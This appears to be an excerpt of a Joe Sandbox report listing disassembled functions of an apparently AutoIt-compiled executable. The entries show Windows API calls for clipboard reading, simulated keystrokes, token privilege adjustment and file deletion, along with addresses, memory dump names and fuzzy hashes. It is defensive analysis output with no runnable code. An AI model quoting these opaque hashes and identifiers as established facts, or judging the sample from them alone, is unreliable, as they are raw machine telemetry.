                                                                                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0096F956
                                                                                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0096F967
                                                                                                                                                                                      • SetCapture.USER32(?), ref: 0096F970
                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0096F9D4
                                                                                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0096F9E0
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0096F9FA
                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 0096FA05
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0096FA3A
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0096FA47
                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0096FAA9
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096FAD3
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0096FB12
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096FB3D
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0096FB55
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0096FB60
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0096FB81
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0096FB8E
                                                                                                                                                                                      • GetParent.USER32(?), ref: 0096FBAA
                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0096FC10
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096FC40
                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0096FC96
                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0096FCC2
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0096FCEA
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096FD0D
                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0096FD57
                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0096FD87
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0096FE1C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                                                                                      • API String ID: 2516578528-4164748364
                                                                                                                                                                                      • Opcode ID: 1424946c5267078bb78b6b8245bfa94e09f3679d4aa33f3fec3e20ef024557a0
                                                                                                                                                                                      • Instruction ID: 1298b8e0a70a5a3badb95577c395d35a49ca4075345b994434d4db6fe933f322
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1424946c5267078bb78b6b8245bfa94e09f3679d4aa33f3fec3e20ef024557a0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1132ED7160830AAFD720DF28D894EAABBE9FF48358F144A29F695872B1D731DC40DB51
                                                                                                                                                                                      Function 0096A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0096AFDB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                                                                                      • API String ID: 3850602802-328681919
                                                                                                                                                                                      • Opcode ID: 807e0e0784231dcdcf820ed8a3f7bdd10cefcd2a683ee6207ba17cfb31e490de
                                                                                                                                                                                      • Instruction ID: 09d5a7f13b9f90251230e14c2e5944747369f1c4a4cb690fe0f1add339feda76
                                                                                                                                                                                      • Opcode Fuzzy Hash: 807e0e0784231dcdcf820ed8a3f7bdd10cefcd2a683ee6207ba17cfb31e490de
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C12DDB1504218ABEB259F64DC49FAE7BB9FF89310F104219F916EB2E1DB748941CF12
                                                                                                                                                                                      Function 0091F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 0091F796
                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00974388
                                                                                                                                                                                      • IsIconic.USER32(000000FF), ref: 00974391
                                                                                                                                                                                      • ShowWindow.USER32(000000FF,00000009), ref: 0097439E
                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 009743A8
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009743BE
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 009743C5
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009743D1
                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009743E2
                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009743EA
                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 009743F2
                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 009743F5
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0097440A
                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00974415
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0097441F
                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00974424
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0097442D
                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00974432
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0097443C
                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00974441
                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00974444
                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0097446B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                      • Opcode ID: 8edb41f64cc76ce2d6043a58cf25e3f2cb54f51949030d6a98d52c3464a13cca
                                                                                                                                                                                      • Instruction ID: 16cef365aa6cceae2e5b61165fb50e4fab3794a4261b591c57ea91ba7caefac4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8edb41f64cc76ce2d6043a58cf25e3f2cb54f51949030d6a98d52c3464a13cca
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC318372A5421CBBEB216B719C4AF7F7F6CEB44B50F108015FA09AA2D1D7B05D00BBA0
                                                                                                                                                                                      Function 0090BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,009C22E8,?,00000000,?,00903E2E,?,00000000,?,0099DBF0,00000000,?), ref: 0090BE8B
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00903E2E,?,00000000,?,0099DBF0,00000000,?,00000002), ref: 0090BEA7
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0090BF19
                                                                                                                                                                                        • Part of subcall function 0092297D: __wsplitpath_helper.LIBCMT ref: 009229BD
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0090BF31
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0090BF46
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0090BF56
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0090C03E
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0090C1ED
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 0090C250
                                                                                                                                                                                        • Part of subcall function 0092010A: std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                        • Part of subcall function 0092010A: __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                        • Part of subcall function 0090C320: _memmove.LIBCMT ref: 0090C419
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                                                                                                                                                                      • API String ID: 2542276039-689609797
                                                                                                                                                                                      • Opcode ID: bbe8218abcdd5b20298079decde2412391e97bb9a31fd43848979a048253ec05
                                                                                                                                                                                      • Instruction ID: 099e50688e80a53f11c67ae3c7de2b3e32debce070efb15da48be51f827cffeb
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbe8218abcdd5b20298079decde2412391e97bb9a31fd43848979a048253ec05
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4542AFB15083459FD710EF60D881BABB7E8AFD4300F00892DF59987292DB75EA49DB93
                                                                                                                                                                                      Function 0093B9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0093BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093BF0F
                                                                                                                                                                                        • Part of subcall function 0093BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0093BF3C
                                                                                                                                                                                        • Part of subcall function 0093BEC3: GetLastError.KERNEL32 ref: 0093BF49
                                                                                                                                                                                      • _memset.LIBCMT ref: 0093BA34
                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0093BA86
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0093BA97
                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0093BAAE
                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 0093BAC7
                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 0093BAD1
                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0093BAEB
                                                                                                                                                                                        • Part of subcall function 0093B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0093B9EC), ref: 0093B8C5
                                                                                                                                                                                        • Part of subcall function 0093B8B0: CloseHandle.KERNEL32(?,?,0093B9EC), ref: 0093B8D7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                                                                                      • Opcode ID: e1ec209b7338818095a48553bcff90f38e380a58719bc97da65de41ee00f6ea0
                                                                                                                                                                                      • Instruction ID: 3b9a5f4f2910abf8b73bce590accc81db038fc94301c1d7f842b45116367732a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e1ec209b7338818095a48553bcff90f38e380a58719bc97da65de41ee00f6ea0
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB816A7190120DAFDF219FA8DD45AEEBBBDEF08304F144519FA54A62A1DB318E14EF20
                                                                                                                                                                                      Function 00946B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 009031DA
                                                                                                                                                                                        • Part of subcall function 00947B9F: __wsplitpath.LIBCMT ref: 00947BBC
                                                                                                                                                                                        • Part of subcall function 00947B9F: __wsplitpath.LIBCMT ref: 00947BCF
                                                                                                                                                                                        • Part of subcall function 00947C0C: GetFileAttributesW.KERNEL32(?,00946A7B), ref: 00947C0D
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946B9D
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946BBB
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00946BE2
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00946BF8
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00946C57
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946C6A
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946C7D
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00946CAB
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00946CBC
                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00946CDB
                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00946CEA
                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00946CFF
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00946D10
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00946D37
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00946D53
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00946D61
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                      • API String ID: 1867810238-1173974218
                                                                                                                                                                                      • Opcode ID: a85eb70daba4bfa04086099673168a66e28f75ab45e66a3868655cc9328d34ba
                                                                                                                                                                                      • Instruction ID: 7db21ef98ef91e22eb99303fc067e369126273e690e69f27111e0e90ccc8d471
                                                                                                                                                                                      • Opcode Fuzzy Hash: a85eb70daba4bfa04086099673168a66e28f75ab45e66a3868655cc9328d34ba
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE5131B290516CAACB21DB90DC84FEE77BCAF0A304F0445D6E549E3181DB349B88CF61
                                                                                                                                                                                      Function 00957099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenClipboard.USER32(0099DBF0), ref: 009570C3
                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 009570D1
                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 009570D9
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 009570E5
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00957101
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0095710B
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00957120
                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0095712D
                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00957135
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00957142
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00957176
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00957283
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                                      • Opcode ID: 594e09afff5453ce966466bf0b60d94eae7006e1650c7716e0bf38f2c0282d57
                                                                                                                                                                                      • Instruction ID: e004fbe31f1d977c002f79f623968f56b2f3598d07309dc179420959cc74eecb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 594e09afff5453ce966466bf0b60d94eae7006e1650c7716e0bf38f2c0282d57
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5051B47120C305AFD300FBA5EC46F6EB7A8AF84B11F004519F956D62E1EF74D9099B62
                                                                                                                                                                                      Function 0094FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0094FE03
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0094FE57
                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094FE7C
                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094FE93
                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0094FEBA
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094FF06
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094FF3F
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094FF93
                                                                                                                                                                                        • Part of subcall function 0092234B: __woutput_l.LIBCMT ref: 009223A4
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094FFE1
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00950030
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0095007F
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 009500CE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                      • API String ID: 108614129-2428617273
                                                                                                                                                                                      • Opcode ID: fdecec73b2160ca0d741625a4cd606afd542b4a50551a32c2a302ff0d24d6b76
                                                                                                                                                                                      • Instruction ID: 28cb3f31bf9e8721f94e30e2ef9db971baadc1c358d2366fe57f3e5098d0e4de
                                                                                                                                                                                      • Opcode Fuzzy Hash: fdecec73b2160ca0d741625a4cd606afd542b4a50551a32c2a302ff0d24d6b76
                                                                                                                                                                                      • Instruction Fuzzy Hash: D0A11BB2508344ABC750EFA4C895EAFB7EDAFD4700F44091DF595C2191EB34EA49CBA2
                                                                                                                                                                                      Function 00952044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00952065
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0095207A
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00952091
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 009520A3
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 009520BD
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 009520D5
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 009520E0
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 009520FC
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00952123
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0095213A
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0095214C
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(009B3A68), ref: 0095216A
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00952174
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00952181
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00952191
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                                                                                      • Opcode ID: 4b7b3d7136ec03b72c761535212061a608287cf87f4793544b0f55c8a53d880d
                                                                                                                                                                                      • Instruction ID: f53e6007ea3bca70fdf68596aff2f313e792eb027ca1b60b2631c07e1770b969
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b7b3d7136ec03b72c761535212061a608287cf87f4793544b0f55c8a53d880d
